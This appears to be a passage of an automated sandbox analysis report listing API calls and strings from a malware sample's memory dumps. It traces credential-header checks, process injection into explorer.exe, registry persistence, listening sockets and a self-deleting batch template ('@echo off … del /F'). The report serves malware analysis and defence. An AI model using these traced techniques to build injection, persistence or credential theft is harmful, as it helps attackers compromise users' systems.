Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C53CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00C53D14
lstrcmpA.KERNEL32(Basic ,?,00C401C0,00000006,Authorization,?,?,?), ref: 00C53D1E

Strings

Basic , xrefs: 00C53D13 00C53D1D

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00C35639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C35642
InitializeCriticalSection.KERNEL32(00C627DC), ref: 00C35652

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3DCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 00C3DCC4
CloseHandle.KERNEL32 ref: 00C3DCD7
CloseHandle.KERNEL32 ref: 00C3DCED

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(00C630F4), ref: 00C50437
QueryPerformanceCounter.KERNEL32(?), ref: 00C50441
GetTickCount.KERNEL32 ref: 00C5044B

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E267, Relevance: 5.4, APIs: 3, Instructions: 16

APIs

TlsGetValue.KERNEL32(?,0351E3A3), ref: 0351E270
DecodePointer.KERNEL32(?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351E282
TlsSetValue.KERNEL32 ref: 0351E291

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C53C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C369B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C42866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C429C9
memcpy.MSVCRT ref: 00C429DC
memcpy.MSVCRT ref: 00C429FD

Part of subcall function 00C465F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00C4675C

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C42A6F

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C36A7D: memcpy.MSVCRT ref: 00C36A9C

Part of subcall function 00C423E2: memmove.MSVCRT ref: 00C42653
Part of subcall function 00C423E2: memcpy.MSVCRT ref: 00C42662

Part of subcall function 00C426D6: memcpy.MSVCRT ref: 00C4274B
Part of subcall function 00C426D6: memmove.MSVCRT ref: 00C42811
Part of subcall function 00C426D6: memcpy.MSVCRT ref: 00C42820

Part of subcall function 00C3E61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 00C3E688

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C369C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C5046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 00C502BE: EnterCriticalSection.KERNEL32(00C63510,?,00C50474,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C502CE
Part of subcall function 00C502BE: LeaveCriticalSection.KERNEL32(00C63510,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C502F8

EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C32FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00C32FBB
CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2D7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 00C2D810
EnterCriticalSection.KERNEL32 ref: 00C2D82D
memcpy.MSVCRT ref: 00C2D878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 00C2D892

Part of subcall function 00C2D6C8: EnterCriticalSection.KERNEL32(?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00C2D6D2
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D74E
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D762
Part of subcall function 00C2D6C8: memcpy.MSVCRT ref: 00C2D78C
Part of subcall function 00C2D6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000), ref: 00C2D7B2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Analysis Process: explorer.exe PID: 1548 Parent PID: 908

Executed Functions

Function 0280CECC, Relevance: 21.3, APIs: 14, Instructions: 290

APIs

Sleep.KERNEL32(00003A98), ref: 0280CEE3

Part of subcall function 02815AF5: InitializeCriticalSection.KERNEL32 ref: 02815AFC

InitializeCriticalSection.KERNEL32(?), ref: 0280CF47
memset.MSVCRT ref: 0280CF5E
InitializeCriticalSection.KERNEL32(?), ref: 0280CF78

Part of subcall function 0280FBE6: memset.MSVCRT ref: 0280FBFD
Part of subcall function 0280FBE6: memset.MSVCRT ref: 0280FCD4

InitializeCriticalSection.KERNEL32(?), ref: 0280CFD2
memset.MSVCRT ref: 0280CFDD
memset.MSVCRT ref: 0280CFEB

Part of subcall function 0282FA0A: EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FB0C
Part of subcall function 0282FA0A: LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FB4D
Part of subcall function 0282FA0A: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0282FB5C
Part of subcall function 0282FA0A: SetEvent.KERNEL32 ref: 0282FB6C
Part of subcall function 0282FA0A: GetExitCodeThread.KERNEL32(?,?), ref: 0282FB80
Part of subcall function 0282FA0A: CloseHandle.KERNEL32 ref: 0282FB96

Part of subcall function 0280BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0280C08A
Part of subcall function 0280BFFE: GetHandleInformation.KERNEL32(?,?), ref: 0280C09C
Part of subcall function 0280BFFE: socket.WS2_32(?,00000001,00000006), ref: 0280C0CF
Part of subcall function 0280BFFE: socket.WS2_32(?,00000002,00000011), ref: 0280C0E0
Part of subcall function 0280BFFE: closesocket.WS2_32(00000002), ref: 0280C0FF
Part of subcall function 0280BFFE: closesocket.WS2_32 ref: 0280C106
Part of subcall function 0280BFFE: memset.MSVCRT ref: 0280C1C8
Part of subcall function 0280BFFE: memcpy.MSVCRT ref: 0280C3C8

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

WaitForMultipleObjects.KERNEL32(?,?,00000000,0000EA60), ref: 0280D061

Part of subcall function 02815B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815B48
Part of subcall function 02815B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 02815B6C
Part of subcall function 02815B40: CloseHandle.KERNEL32 ref: 02815B7C
Part of subcall function 02815B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815BAC

Part of subcall function 0280C41C: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C44D
Part of subcall function 0280C41C: WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C4DF
Part of subcall function 0280C41C: SetEvent.KERNEL32 ref: 0280C532
Part of subcall function 0280C41C: SetEvent.KERNEL32 ref: 0280C56B
Part of subcall function 0280C41C: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280C5F0

Part of subcall function 0281229C: EnterCriticalSection.KERNEL32(?,?,?,?,?,0280D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 028122BD
Part of subcall function 0281229C: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,0280D154,?,?,?,00000001,?,?,?,00000000,0000EA60), ref: 028122D9

Part of subcall function 02813172: memset.MSVCRT ref: 0281328F
Part of subcall function 02813172: memcpy.MSVCRT ref: 028132A2
Part of subcall function 02813172: memcpy.MSVCRT ref: 028132B8

Part of subcall function 02832D0B: accept.WS2_32(?,0000EA60), ref: 02832D2C
Part of subcall function 02832D0B: WSAEventSelect.WS2_32(?,00000000,00000000), ref: 02832D3E
Part of subcall function 02832D0B: WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0280D163,?), ref: 02832D6F
Part of subcall function 02832D0B: shutdown.WS2_32(?,00000002), ref: 02832D87
Part of subcall function 02832D0B: closesocket.WS2_32 ref: 02832D8E
Part of subcall function 02832D0B: WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0280D163), ref: 02832D95

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

Part of subcall function 0280C5FE: EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,0280D203,?,?,00000000,?,?,?,?,00000000), ref: 0280C631
Part of subcall function 0280C5FE: memcmp.MSVCRT ref: 0280C67F
Part of subcall function 0280C5FE: SetEvent.KERNEL32 ref: 0280C6C0
Part of subcall function 0280C5FE: LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280C6ED

Part of subcall function 02815C67: EnterCriticalSection.KERNEL32(02991F34,?,?,00000001,02824EA8,?,?,00000001), ref: 02815C70
Part of subcall function 02815C67: LeaveCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815C7A
Part of subcall function 02815C67: WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 02815CA0
Part of subcall function 02815C67: EnterCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815CB8
Part of subcall function 02815C67: LeaveCriticalSection.KERNEL32(02991F34,?,00000001,02824EA8,?,?,00000001), ref: 02815CC2

CloseHandle.KERNEL32(?), ref: 0280D260
CloseHandle.KERNEL32(?), ref: 0280D26D

Part of subcall function 0282FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,0282FB19,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FE4D
Part of subcall function 0282FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,0282FB19,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FE84

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280D283

Part of subcall function 0280FCFF: memset.MSVCRT ref: 0280FD0F

DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280D2A2
CloseHandle.KERNEL32(?), ref: 0280D2AF
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 0280D2B9

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02815B10: CloseHandle.KERNEL32 ref: 02815B20
Part of subcall function 02815B10: DeleteCriticalSection.KERNEL32(?,?,02991F28,02824EB9,?,?,00000001), ref: 02815B37

Part of subcall function 0280CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 0280CEB9

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02820A9A, Relevance: 18.4, APIs: 8, Strings: 1, Instructions: 182

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02820AD8
PathRemoveFileSpecW.SHLWAPI(?), ref: 02820B26

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

FindFirstFileW.KERNEL32(?,?), ref: 02820B93
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02820BEA
FindClose.KERNEL32 ref: 02820CF3

Part of subcall function 0280E4C3: GetFileSizeEx.KERNEL32(?,?), ref: 0280E4CE

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

SetLastError.KERNEL32(00000057,?), ref: 02820C5B

Part of subcall function 0280E543: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0280E555

CloseHandle.KERNEL32 ref: 02820C95

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

FindNextFileW.KERNEL32(?,?), ref: 02820CC9

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 02820AFA

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02834181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 028341A1
Process32FirstW.KERNEL32(?,?), ref: 028341C6

Part of subcall function 0282BE5A: CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282BEA0
Part of subcall function 0282BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0282BEAC
Part of subcall function 0282BE5A: CloseHandle.KERNEL32 ref: 0282BEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 0283421D
CloseHandle.KERNEL32(?), ref: 028342E7

Part of subcall function 0281500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 02815020
Part of subcall function 0281500E: GetTokenInformation.ADVAPI32(?,0000000C,02842968,00000004,?), ref: 02815048
Part of subcall function 0281500E: CloseHandle.KERNEL32(?), ref: 0281505E

CloseHandle.KERNEL32 ref: 0283423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 02834257
memcmp.MSVCRT ref: 0283426F

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

Part of subcall function 028340CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 028340DC
Part of subcall function 028340CB: CreateThread.KERNEL32(00000000,00000000,028340AB,?), ref: 02834132
Part of subcall function 028340CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0283413D
Part of subcall function 028340CB: CloseHandle.KERNEL32 ref: 02834144
Part of subcall function 028340CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 02834154
Part of subcall function 028340CB: CloseHandle.KERNEL32(?), ref: 0283415B
Part of subcall function 028340CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0283416C
Part of subcall function 028340CB: CloseHandle.KERNEL32 ref: 02834173

Process32NextW.KERNEL32(?,?), ref: 028342F3
CloseHandle.KERNEL32 ref: 02834306

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028107D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 028107D6
memcpy.MSVCRT ref: 02810822
memset.MSVCRT ref: 0281085A
GetThreadContext.KERNEL32(?,?), ref: 02810895
SetThreadContext.KERNEL32(?,?), ref: 02810900
GetCurrentProcess.KERNEL32 ref: 02810919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 0281093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 02810950

Part of subcall function 02810643: memset.MSVCRT ref: 02810654

Part of subcall function 028103FD: GetCurrentProcess.KERNEL32 ref: 02810400
Part of subcall function 028103FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 02810421
Part of subcall function 028103FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0281042A

ResumeThread.KERNEL32(?), ref: 02810992

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0281072F: GetCurrentThreadId.KERNEL32 ref: 02810730
Part of subcall function 0281072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 02810767
Part of subcall function 0281072F: ResumeThread.KERNEL32(?), ref: 028107A8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281E257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 0281568C: TlsSetValue.KERNEL32(00000001,0281E1BD), ref: 02815699

GetCurrentThread.KERNEL32 ref: 0281E26F
SetThreadPriority.KERNEL32 ref: 0281E276

Part of subcall function 0282BEE3: CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0281E2C0

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Part of subcall function 0281E22A: PathFindFileNameW.SHLWAPI(?), ref: 0281E22E
Part of subcall function 0281E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 0281E242
Part of subcall function 0281E22A: CharUpperW.USER32(?,?,?,0281E32B), ref: 0281E24C

PathQuoteSpacesW.SHLWAPI(?), ref: 0281E333

Part of subcall function 02824B8D: WaitForSingleObject.KERNEL32(00000000,0281E1D7), ref: 02824B95

WaitForSingleObject.KERNEL32 ref: 0281E374
StrCmpW.SHLWAPI(?,?), ref: 0281E3CE

Part of subcall function 02820D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 02820D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 0281E42F

Part of subcall function 02820D19: RegFlushKey.ADVAPI32 ref: 02820D29
Part of subcall function 02820D19: RegCloseKey.ADVAPI32 ref: 02820D31

WaitForSingleObject.KERNEL32 ref: 0281E450

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 0281E2E2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280BFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 02825C6B: memset.MSVCRT ref: 02825C7A
Part of subcall function 02825C6B: memcpy.MSVCRT ref: 02825CA1

Part of subcall function 02830741: CoInitializeEx.OLE32(00000000,00000000), ref: 0283074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 0280C08A
GetHandleInformation.KERNEL32(?,?), ref: 0280C09C

Part of subcall function 02832755: EnterCriticalSection.KERNEL32(02843510,?,028330AF,?,?,00000000), ref: 02832765
Part of subcall function 02832755: LeaveCriticalSection.KERNEL32(02843510,?,00000000), ref: 0283278F

socket.WS2_32(?,00000001,00000006), ref: 0280C0CF
socket.WS2_32(?,00000002,00000011), ref: 0280C0E0
closesocket.WS2_32(00000002), ref: 0280C0FF
closesocket.WS2_32 ref: 0280C106

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

memset.MSVCRT ref: 0280C1C8

Part of subcall function 02832BF3: bind.WS2_32(?,02832CD1), ref: 02832C3A
Part of subcall function 02832BF3: listen.WS2_32(?,00000014), ref: 02832C4F
Part of subcall function 02832BF3: WSAGetLastError.WS2_32(00000000,?,02832CD1,?,?,?,?,00000000), ref: 02832C5D
Part of subcall function 02832BF3: WSASetLastError.WS2_32(?,?,02832CD1,?,?,?,?,00000000), ref: 02832C6D

Part of subcall function 02832C7A: memset.MSVCRT ref: 02832C90
Part of subcall function 02832C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 02832CD5

Part of subcall function 02832AB4: memset.MSVCRT ref: 02832AC9
Part of subcall function 02832AB4: getsockname.WS2_32(?,0280C22C,?), ref: 02832ADC

Part of subcall function 0280C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0280C404

memcpy.MSVCRT ref: 0280C3C8

Part of subcall function 0282BF3B: CoUninitialize.OLE32 ref: 0283078C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(02991F34,02991F28,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 02815BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,0281E48F,00000000,00000000,00000002), ref: 02815C16
GetLastError.KERNEL32(?,000000FF,0281E48F,00000000,00000000,00000002,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001), ref: 02815C20
TerminateThread.KERNEL32 ref: 02815C28
CloseHandle.KERNEL32 ref: 02815C2F

Part of subcall function 028169C9: HeapAlloc.KERNEL32(00000000,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?,?,?), ref: 028169F3
Part of subcall function 028169C9: HeapReAlloc.KERNEL32(00000000,?,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?), ref: 02816A06

LeaveCriticalSection.KERNEL32(02991F34,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815C44
ResumeThread.KERNEL32 ref: 02815C5D

Part of subcall function 02816A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?,?), ref: 02816A43
Part of subcall function 02816A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0282CB50,?,00000000,00000001,00000001,0282CB1A,?,028154E4,?,@echo off%sdel /F "%s",?), ref: 02816A56

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028247E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02824819

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

lstrcatW.KERNEL32(?,.dat), ref: 02824879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0282489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 028248BB
CloseHandle.KERNEL32 ref: 028248C8

Part of subcall function 02811905: EnterCriticalSection.KERNEL32(02991E90,00000000,?,?,?,?,028248EB,?,?,00000000), ref: 02811913
Part of subcall function 02811905: GetFileVersionInfoSizeW.VERSION(02991EF0,?,?,?,?,?,028248EB,?,?,00000000), ref: 02811933
Part of subcall function 02811905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 02811953
Part of subcall function 02811905: LeaveCriticalSection.KERNEL32(02991E90,?,?,?,?,028248EB,?,?,00000000), ref: 028119D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0282483A
.dat, xrefs: 0282486D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(02842980,00000001), ref: 0283359E
SetSecurityDescriptorDacl.ADVAPI32(02842980,00000001,00000000,00000000), ref: 028335AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 028335C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 028335E1
